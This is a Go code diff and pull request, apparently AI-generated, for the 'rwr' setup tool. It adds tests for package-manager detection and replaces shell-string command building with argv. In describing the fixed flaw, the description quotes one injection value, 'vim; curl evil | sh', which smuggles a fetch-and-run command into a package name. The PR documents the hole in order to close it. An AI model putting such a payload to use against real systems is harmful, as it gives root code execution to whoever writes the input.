+}
+
+// The regression this change fixes, stated directly: the per-OS setup used to
+// keep only providers whose distribution list literally contained "linux". Every
+// package manager that names concrete distributions was therefore dropped from
+// osInfo.PackageManager.Managers, which is what CleanPackageManagers and the
+// core-package (openssl, build-essentials) resolution read from.
+//
+// Fails against the old literal filter, passes against supportsSystem.
+func TestProviderFilter_LiteralLinuxMatchWouldDropRealPackageManagers(t *testing.T) {
+	loaded := mustLoadEmbedded(t)
+
+	// Package managers a Linux user actually installs things with.
+	realManagers := []string{"apt", "dnf", "pacman", "zypper", "apk", "paru", "yay"}
+
+	for _, name := range realManagers {
+		provider, ok := loaded[name]
+		if !ok {
+			t.Fatalf("provider %q is not in the embedded definitions", name)
+		}
+
+		// This is the old predicate: a literal string match for "linux".
+		keptByLiteralMatch := slices.Contains(provider.Detection.Distributions, "linux")
+		if keptByLiteralMatch {
+			t.Errorf("provider %q now declares the linux wildcard; this test no longer "+
+				"covers the regression and should be revisited", name)
+		}
+
+		// This is the predicate in use, evaluated for a distro the provider serves.
+		distro := provider.Detection.Distributions[0]
+		if !supportsSystem(provider, "linux", distro) {
+			t.Errorf("provider %q must be available on linux/%s", name, distro)
+		}
+	}
+}
+
+// End-to-end proof on a real machine: after OS detection, the distribution's own
+// package manager must appear in osInfo.PackageManager.Managers. That map is what
+// CleanPackageManagers and the core-package installers consume, and under the old
+// literal "linux" filter it never contained apt/dnf/pacman/zypper/apk — so a
+// system running `rwr all` reported "Cleaning up package managers" while never
+// cleaning the one package manager it actually uses.
+//
+// Skips where none of these are installed, so it is meaningful in CI containers
+// and on developer machines alike without being flaky.
+func TestSetLinuxDetails_IncludesNativePackageManager(t *testing.T) {
+	if runtime.GOOS != "linux" {
+		t.Skip("Linux-only")
+	}
+
+	native := ""
+	for _, name := range []string{"pacman", "apt", "dnf", "zypper", "apk", "xbps-install"} {
+		if _, err := exec.LookPath(name); err == nil {
+			native = name
+			break
+		}
+	}
+	if native == "" {
+		t.Skip("no distribution package manager found on PATH")
+	}
+
+	// xbps-install is the binary; the provider is named xbps.
+	providerName := native
+	if native == "xbps-install" {
+		providerName = "xbps"
+	}
+
+	osInfo := &types.OSInfo{}
+	osInfo.System.OSFamily = getOSFamily()
+
+	if err := SetLinuxDetails(osInfo); err != nil {
+		t.Fatalf("SetLinuxDetails: %v", err)
+	}
+
+	if _, ok := osInfo.PackageManager.Managers[providerName]; !ok {
+		t.Errorf("native package manager %q missing from Managers; got %v",
+			providerName, managerNames(osInfo))
+	}
+}
+
+func managerNames(osInfo *types.OSInfo) []string {
+	names := make([]string, 0, len(osInfo.PackageManager.Managers))
+	for name := range osInfo.PackageManager.Managers {
+		names = append(names, name)
+	}
+	sort.Strings(names)
+	return names
+}
+
+// A provider that names an operating system must only surface on that OS.
+func TestTargetsOS(t *testing.T) {
+	loaded := mustLoadEmbedded(t)
+
+	tests := []struct {
+		provider string
+		os       string
+		want     bool
+	}{
+		{"winget", "windows", true},
+		{"winget", "linux", false},
+		{"scoop", "darwin", false},
+		{"brew", "darwin", true},
+		{"brew", "linux", true},
+		{"flatpak", "linux", true},
+		{"flatpak", "windows", false},
+		// Distro-scoped providers name no OS token, so the binary and file
+		// evidence decides; those paths do not exist on the wrong OS.
+		{"pacman", "linux", true},
+		{"apt", "linux", true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.provider+"/"+tt.os, func(t *testing.T) {
+			provider, ok := loaded[tt.provider]
+			if !ok {
+				t.Fatalf("provider %q is not in the embedded definitions", tt.provider)
+			}
+			if got := targetsOS(provider, tt.os); got != tt.want {
+				t.Errorf("targetsOS(%s, %s) = %v, want %v (distributions=%v)",
+					tt.provider, tt.os, got, tt.want, provider.Detection.Distributions)
+			}
+		})
+	}
+}
+
+// Every distro-scoped package manager must declare file evidence, because that is
+// what makes it detectable on a derivative distribution nobody has listed. A
+// provider without it can only ever be found by exact name match.
+func TestEmbeddedProviders_DistroScopedProvidersDeclareFileEvidence(t *testing.T) {
+	loaded := mustLoadEmbedded(t)
+
+	for _, name := range []string{"apt", "dnf", "pacman", "zypper", "apk", "paru", "yay", "xbps"} {
+		provider, ok := loaded[name]
+		if !ok {
+			t.Fatalf("provider %q is not in the embedded definitions", name)
+		}
+		if len(provider.Detection.Files) == 0 {
+			t.Errorf("provider %q declares no detection files, so it cannot be detected "+
+				"on an unlisted derivative distribution", name)
+		}
+	}
+}
+
+// Family inference is what lets an unlisted derivative still get the right
+// default. GetDistroFamily handles the distributions we know; anything else is
+// resolved from the package manager that is actually installed.
+func TestLinuxFamily(t *testing.T) {
+	// Simulate a Debian-derived host: its ID_LIKE must not decide the family of
+	// the unrelated distributions these cases ask about.
+	restore := stubHost(t, "ubuntu", "debian")
+	defer restore()
+
+	tests := []struct {
+		name     string
+		osFamily string
+		managers []string
+		want     string
+	}{
+		{
+			name:     "known distro resolves from its name",
+			osFamily: "debian",
+			managers: []string{"apt", "flatpak"},
+			want:     "debian",
+		},
+		{
+			name:     "known derivative resolves through its family",
+			osFamily: "endeavouros",
+			managers: []string{"pacman"},
+			want:     "arch",
+		},
+		{
+			// PrismLinux: ID=prismlinux, no ID_LIKE, listed by nobody.
+			name:     "unlisted derivative is inferred from the installed manager",
+			osFamily: "prismlinux",
+			managers: []string{"flatpak", "pacman", "yay"},
+			want:     "arch",
+		},
+		{
+			name:     "unlisted debian derivative is inferred from apt",
+			osFamily: "somethingnew",
+			managers: []string{"apt", "snap"},
+			want:     "debian",
+		},
+		{
+			name:     "no native manager means no family",
+			osFamily: "mysterylinux",
+			managers: []string{"flatpak", "nix"},
+			want:     "",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			osInfo := &types.OSInfo{}
+			osInfo.System.OSFamily = tt.osFamily
+			osInfo.PackageManager.Managers = map[string]types.PackageManagerInfo{}
+			for _, m := range tt.managers {
+				osInfo.PackageManager.Managers[m] = pm(m)
+			}
+
+			if got := linuxFamily(osInfo); got != tt.want {
+				t.Errorf("linuxFamily(%q, managers=%v) = %q, want %q",
+					tt.osFamily, tt.managers, got, tt.want)
+			}
+		})
+	}
+}
+
+// An Arch derivative nobody has listed must still prefer its AUR helper over
+// flatpak. The previous os-release lookup returned the first provider matching
+// the distro, and flatpak/snap/nix/cargo all claim the "linux" wildcard, so an
+// unrecognised Arch system ended up defaulting to flatpak.
+func TestLinuxPreferredManagers_UnlistedArchDerivativePrefersAURHelper(t *testing.T) {
+	restore := stubHost(t, "ubuntu", "debian")
+	defer restore()
+
+	osInfo := &types.OSInfo{}
+	osInfo.System.OSFamily = "prismlinux"
+	osInfo.PackageManager.Managers = map[string]types.PackageManagerInfo{
+		"flatpak": pm("flatpak"),
+		"pacman":  pm("pacman"),
+		"yay":     pm("yay"),
+	}
+
+	setDefaultManager(osInfo, linuxPreferredManagers(osInfo))
+
+	if got := osInfo.PackageManager.Default.Name; got != "yay" {
+		t.Errorf("default = %q, want yay (AUR helper ahead of pacman and flatpak)", got)
+	}
+}
+
+// Every family that names native managers must name ones that exist as providers,
+// otherwise the preference list silently does nothing.
+func TestNativeManagers_ReferenceRealProviders(t *testing.T) {
+	loaded := mustLoadEmbedded(t)
+
+	for family, managers := range nativeManagers {
+		for _, name := range managers {
+			if _, ok := loaded[name]; !ok {
+				t.Errorf("family %q prefers %q, which is not an embedded provider", family, name)
+			}
+		}
+	}
+
+	for manager, family := range managerFamily {
+		if _, ok := loaded[manager]; !ok {
+			t.Errorf("managerFamily maps %q, which is not an embedded provider", manager)
+		}
+		if _, ok := nativeManagers[family]; !ok {
+			t.Errorf("managerFamily maps %q to family %q, which has no native managers", manager, family)
+		}
+	}
+}
+
+// stubHost models a machine running host with the given ID_LIKE, for the
+// duration of a test, so results do not depend on whatever distribution the
+// tests happen to run on.
+//
+// It mirrors the real lookup: ID_LIKE answers only for the host's own
+// distribution and is empty for anything else.
+func stubHost(t *testing.T, host, idLike string) func() {
+	t.Helper()
+	previous := idLikeFor
+	idLikeFor = func(distro string) string {
+		if strings.EqualFold(distro, host) {
+			return idLike
+		}
+		return ""
+	}
+	return func() { idLikeFor = previous }
+}
+
+// ID_LIKE must only ever answer for the machine it describes. Asking whether
+// some unrelated distribution belongs to a family used to be answered from the
+// host's ID_LIKE, so on a Debian derivative every unknown distro looked like
+// debian — and apt looked available on Arch.
+func TestIsDistroInFamily_IgnoresHostIDLikeForOtherDistros(t *testing.T) {
+	restore := stubHost(t, "ubuntu", "debian")
+	defer restore()
+
+	if IsDistroInFamily("arch", "debian") {
+		t.Error("arch must not be reported as debian-family")
+	}
+	if !IsDistroInFamily("endeavouros", "arch") {
+		t.Error("endeavouros must be reported as arch-family")
+	}
+	if !IsDistroInFamily("debian", "debian") {
+		t.Error("a family is its own family")
+	}
+}
+
+func TestGetDistroFamily_UnknownDistroIsNotMappedToHostFamily(t *testing.T) {
+	restore := stubHost(t, "ubuntu", "debian")
+	defer restore()
+
+	if got := GetDistroFamily("mysterylinux"); got != "mysterylinux" {
+		t.Errorf("GetDistroFamily(mysterylinux) = %q, want it returned unchanged", got)
+	}
+	if got := GetDistroFamily("linuxmint"); got != "ubuntu" {
+		t.Errorf("GetDistroFamily(linuxmint) = %q, want ubuntu", got)
+	}
+}
+
+// When the distro being asked about *is* the host, ID_LIKE is exactly the right
+// signal and must still be used.
+func TestGetDistroFamily_UsesHostIDLikeForTheHostItself(t *testing.T) {
+	host := getLinuxDistro()
+	if _, known := distroFamilies[host]; known {
+		t.Skip("host distribution is itself a known family")
+	}
+
+	previous := idLikeFor
+	idLikeFor = func(distro string) string {
+		if distro == host {
+			return "arch"
+		}
+		return ""
+	}
+	defer func() { idLikeFor = previous }()
+
+	if got := GetDistroFamily(host); got != "arch" {
+		t.Errorf("GetDistroFamily(%q) = %q, want arch from the host ID_LIKE", host, got)
+	}
+}

--- a/internal/system/packages.go
+++ b/internal/system/packages.go
@@ -2,6 +2,7 @@ package system
 
 import (
 	"fmt"
+	"strings"
 
 	"github.com/charmbracelet/log"
 	"github.com/fynxlabs/rwr/internal/types"
@@ -54,8 +55,8 @@ func InstallOpenSSL(osInfo *types.OSInfo, initConfig *types.InitConfig) error {
 	// Install each package
 	log.Debugf("Installing OpenSSL packages with %s: %v", provider.Name, packages)
 	installCmd := types.Command{
-		Exec:     fmt.Sprintf("%s %s", provider.BinPath, provider.Commands.Install),
-		Args:     packages,
+		Exec:     provider.BinPath,
+		Args:     append(strings.Fields(provider.Commands.Install), packages...),
 		Elevated: provider.Elevated,
 	}
 
@@ -107,8 +108,8 @@ func InstallBuildEssentials(osInfo *types.OSInfo, initConfig *types.InitConfig) 
 	// Install each package
 	log.Debugf("Installing build essential packages with %s: %v", provider.Name, packages)
 	installCmd := types.Command{
-		Exec:     fmt.Sprintf("%s %s", provider.BinPath, provider.Commands.Install),
-		Args:     packages,
+		Exec:     provider.BinPath,
+		Args:     append(strings.Fields(provider.Commands.Install), packages...),
 		Elevated: provider.Elevated,
 	}
 

--- a/internal/system/providers.go
+++ b/internal/system/providers.go
@@ -5,7 +5,6 @@ import (
 	"os"
 	"path/filepath"
 	"runtime"
-	"strings"
 	"sync"
 
 	"github.com/BurntSushi/toml"
@@ -123,12 +122,24 @@ func getSystemInfo() (string, string) {
 	return currentOS, currentDistro
 }
 
-// isProviderAvailable checks if a provider is usable on the current system by
-// verifying OS/distro support, binary availability, and required files.
-// Returns the binary path and true if available.
+// isProviderAvailable checks if a provider is usable on the current system,
+// returning the binary path and true if it is.
+//
+// Availability is decided by evidence on the machine rather than by what the
+// distribution calls itself. A named distro match is accepted, but so is the
+// combination of "the binary is installed" plus "every file the provider declares
+// as proof of itself exists" — for pacman that is /etc/pacman.conf and
+// /var/lib/pacman. There are far more Arch and Debian derivatives than any list
+// can track (this was found on PrismLinux, which no provider names and which sets
+// no ID_LIKE), and a machine that has pacman's binary and pacman's database is
+// running pacman whatever /etc/os-release says.
+//
+// The reverse case is covered too: a system that calls itself Arch but installs
+// packages with apt has no /etc/apt and no apt binary, so apt stays unavailable.
+// The OS gate below still applies, so Windows providers never surface on Linux.
 func isProviderAvailable(provider *types.Provider, currentOS, currentDistro string) (string, bool) {
-	if !supportsSystem(provider, currentOS, currentDistro) {
-		log.Debugf("GetAvailableProviders: Provider %s does not support %s/%s", provider.Name, currentOS, currentDistro)
+	if !targetsOS(provider, currentOS) {
+		log.Debugf("GetAvailableProviders: Provider %s does not target %s", provider.Name, currentOS)
 		return "", false
 	}
 
@@ -142,7 +153,49 @@ func isProviderAvailable(provider *types.Provider, currentOS, currentDistro stri
 		return "", false
 	}
 
-	return tool.Bin, true
+	if supportsSystem(provider, currentOS, currentDistro) {
+		return tool.Bin, true
+	}
+
+	// Unrecognised distribution. Accept it when the provider declares files that
+	// prove it is genuinely in use, and say so — a provider with no such files has
+	// only its distro list to go on, so it stays unavailable.
+	if len(provider.Detection.Files) > 0 {
+		log.Debugf("GetAvailableProviders: Provider %s not listed for %s/%s but its binary and required files are present; treating as available",
+			provider.Name, currentOS, currentDistro)
+		return tool.Bin, true
+	}
+
+	log.Debugf("GetAvailableProviders: Provider %s does not support %s/%s", provider.Name, currentOS, currentDistro)
+	return "", false
+}
+
+// osTokens are the distribution entries that name an operating system rather than
+// a Linux distribution.
+var osTokens = map[string]bool{
+	types.OSLinux:   true,
+	types.OSDarwin:  true,
+	types.OSWindows: true,
+}
+
+// targetsOS reports whether a provider is meant for the current operating system.
+//
+// A provider that names any OS token must name this one. A provider that lists
+// only distributions (pacman, apt, dnf) is not OS-specific in its declaration, so
+// the file and binary checks decide — those paths simply do not exist on the wrong
+// OS.
+func targetsOS(provider *types.Provider, currentOS string) bool {
+	namedAnOS := false
+	for _, dist := range provider.Detection.Distributions {
+		if !osTokens[dist] {
+			continue
+		}
+		namedAnOS = true
+		if dist == currentOS {
+			return true
+		}
+	}
+	return !namedAnOS
 }
 
 // supportsSystem checks if a provider's distribution list matches the current OS/distro.
@@ -317,48 +370,6 @@ func LoadProviderDefinition(path string) (*types.Provider, error) {
 
 	log.Debugf("LoadProviderDefinition: Loaded provider %s with binary %s", provider.Name, provider.Detection.Binary)
 	return &provider, nil
-}
-
-// GetDefaultProviderFromOSRelease determines the default package manager by
-// reading the ID field from /etc/os-release and mapping it to a known provider.
-func GetDefaultProviderFromOSRelease() string {
-	// Read the contents of the /etc/os-release file
-	data, err := os.ReadFile("/etc/os-release")
-	if err != nil {
-		log.Warnf("Error reading /etc/os-release file: %s", err)
-		return ""
-	}
-
-	// Parse the contents of the file
-	osRelease := make(map[string]string)
-	for _, line := range strings.Split(string(data), "\n") {
-		if strings.Contains(line, "=") {
-			parts := strings.SplitN(line, "=", 2)
-			key := strings.TrimSpace(parts[0])
-			value := strings.Trim(strings.TrimSpace(parts[1]), "\"")
-			osRelease[key] = value
-		}
-	}
-
-	// Check the ID field first
-	id := osRelease["ID"]
-	if id != "" {
-		if prov, exists := GetProviderForDistro(id); exists {
-			return prov.Name
-		}
-	}
-
-	// If ID doesn't match any known distribution, check ID_LIKE
-	idLike := osRelease["ID_LIKE"]
-	if idLike != "" {
-		for _, distro := range strings.Split(idLike, " ") {
-			if prov, exists := GetProviderForDistro(distro); exists {
-				return prov.Name
-			}
-		}
-	}
-
-	return ""
 }
 
 // GetProviderForDistro returns the first available provider whose detection

--- a/internal/system/windows.go
+++ b/internal/system/windows.go
@@ -13,45 +13,8 @@ import (
 func SetWindowsDetails(osInfo *types.OSInfo) error {
 	log.Debug("Setting Windows package manager details.")
 
-	// Initialize package manager map
-	if osInfo.PackageManager.Managers == nil {
-		osInfo.PackageManager.Managers = make(map[string]types.PackageManagerInfo)
-	}
-
-	// Get available providers
-	available := GetAvailableProviders()
-
-	// Add all available Windows package managers
-	for name, prov := range available {
-		// Skip if not a Windows provider
-		if !Contains(prov.Detection.Distributions, "windows") {
-			continue
-		}
-
-		if tool := FindTool(prov.Detection.Binary); tool.Exists {
-			osInfo.PackageManager.Managers[name] = GetPackageManagerInfo(prov, tool.Bin)
-			log.Debugf("Added package manager: %s", name)
-		}
-	}
-
-	// Set default package manager (prefer winget)
-	if pm, exists := osInfo.PackageManager.Managers["winget"]; exists {
-		osInfo.PackageManager.Default = pm
-		log.Infof("Set winget as default package manager")
-	} else if pm, exists := osInfo.PackageManager.Managers["chocolatey"]; exists {
-		osInfo.PackageManager.Default = pm
-		log.Infof("Set Chocolatey as default package manager")
-	} else if pm, exists := osInfo.PackageManager.Managers["scoop"]; exists {
-		osInfo.PackageManager.Default = pm
-		log.Infof("Set Scoop as default package manager")
-	} else {
-		// Use first available package manager as default
-		for _, pm := range osInfo.PackageManager.Managers {
-			osInfo.PackageManager.Default = pm
-			log.Infof("Set %s as default package manager", pm.Name)
-			break
-		}
-	}
+	collectAvailableManagers(osInfo)
+	setDefaultManager(osInfo, []string{"winget", "chocolatey", "scoop"})
 
 	return nil
 }

--- a/internal/types/constants.go
+++ b/internal/types/constants.go
@@ -5,7 +5,6 @@ const (
 	BlueprintTypePackages        = "packages"
 	BlueprintTypeRepositories    = "repositories"
 	BlueprintTypeFiles           = "files"
-	BlueprintTypeDirectories     = "directories"
 	BlueprintTypeGit             = "git"
 	BlueprintTypeScripts         = "scripts"
 	BlueprintTypeSSHKeys         = "ssh_keys"


### PR DESCRIPTION
Rebased onto `master` after #141 and #144 landed. This branch absorbed #143 and
#147 when they were merged into it, so it now carries **three** fixes. Each is a
separate commit and reviewable on its own.

---

## 1. Commands are built as argv, not shell strings

`buildCommand` joined `Exec` and `Args` into one string and handed it to `sh -c`
(or `sudo sh -c`). Every value a blueprint supplies — package names, paths,
service names, ssh key comments, password hashes — was re-parsed as shell syntax,
under sudo for any provider with `elevated = true`. Blueprints come from cloned
git repos, so a package entry of `vim; curl evil | sh` was root execution.

```go
exec.Command(cmd.Exec, cmd.Args...)                    // normal
exec.Command("sudo", "--", cmd.Exec, cmd.Args...)      // Elevated
exec.Command("sudo", "-u", user, "--", cmd.Exec, ...)  // AsUser
```

**Elevation policy is unchanged** — still per-command via `Elevated`/`AsUser`.
Only the spawn differs.

Three bugs fall out of the same fix: arguments containing spaces were silently
re-split; `$6$rounds=...` password hashes were shell-expanded and corrupted before
`useradd` saw them; and non-elevated commands ran through `sh -c`, which does not
exist on Windows.

A shell is still available where wanted — it just has to be declared, which the
AUR bootstrap steps already do (`exec = "sh", args = ["-c", "cd /tmp/paru && …"]`).

Also fixes `setOutputStreams` closing the log file *before* the command ran
(discarding everything a script wrote), and stderr being captured in interactive
mode (which hid sudo's password prompt).

Adds `internal/exectest.Recorder` + `system.SetExecutor` so processors can be
asserted on by exact argv without spawning anything.

## 2. Package managers are detected by evidence, not distro name

Two defects meant `osInfo.PackageManager.Managers` rarely held the package
manager the machine actually uses:

- The per-OS setup re-filtered with a **literal `"linux"` string match**, dropping
  apt/dnf/pacman/zypper and the AUR helpers — everything that names concrete
  distros. `CleanPackageManagers` reads that map, so `rwr all` logged "Cleaning up
  package managers" while never cleaning pacman or apt.
- Availability keyed off the **distribution name**, so any unlisted derivative
  lost its package manager. Found on the dev machine: PrismLinux reports
  `ID=prismlinux` with no `ID_LIKE`, so only flatpak was available.

Availability is now decided by evidence: the binary is installed **and** every
file the provider declares as proof of itself exists (`/etc/pacman.conf`,
`/var/lib/pacman`). A box with pacman's binary and pacman's database is running
pacman whatever `/etc/os-release` says. **This does not open the floodgates** — a
system calling itself Arch but running apt has no apt binary and no `/etc/apt`.

Families map to native managers explicitly, and when os-release names something
unknown the family is **inferred from what is installed**. `GetDefaultProviderFromOSRelease`
is deleted: it returned the first match from a randomized map, and the wildcard
providers match every distro, so it was picking **flatpak as the default for an
Arch system**, nondeterministically.

Includes a fix CI caught: `ID_LIKE` was consulted for distros it does not
describe, so on a Debian-derived host `IsDistroInFamily("arch", "debian")`
returned true. It now answers only for the host's own distribution.

Selection is deterministic throughout — both fallbacks used to be "whatever the
map yields first".

## 3. Run order and font templating

- `users` was **missing from the default run order**, so `rwr all` never processed
  user blueprints. `rwr run users` worked, which hid it.
- `packageManagers` was *in* the order with **no dispatch case**, warning
  "Unknown processor" every run.
- Fonts received **raw bytes** instead of the template-resolved blueprint, so
  `{{ }}` silently did not work there.
- `rwr run directories` was a **guaranteed no-op** — directories are a key inside
  a files blueprint, already handled by `ProcessFiles`. Command, constant and docs
  entry removed. *This removes a CLI command*, though it could not have done
  anything.

---

## Tests

Every new test **fails on `8bdc84f`** and passes here: injection payloads,
argument spacing, password hashes, elevation forms, explicit shells, the Windows
path, log capture, argv splitting for clean/scripts, distro matching across eight
distributions, negative cases, family inference, `ID_LIKE` scoping, determinism
over 100 iterations, and run-order coverage from both directions.

Deletes the struct-literal tests that only asserted Go stores what you assign it.

`go build`, `go test ./...`, `go vet`, `golangci-lint run` and `gosec ./...` all pass.

🤖 Generated with [Claude Code](https://claude.com/claude-code)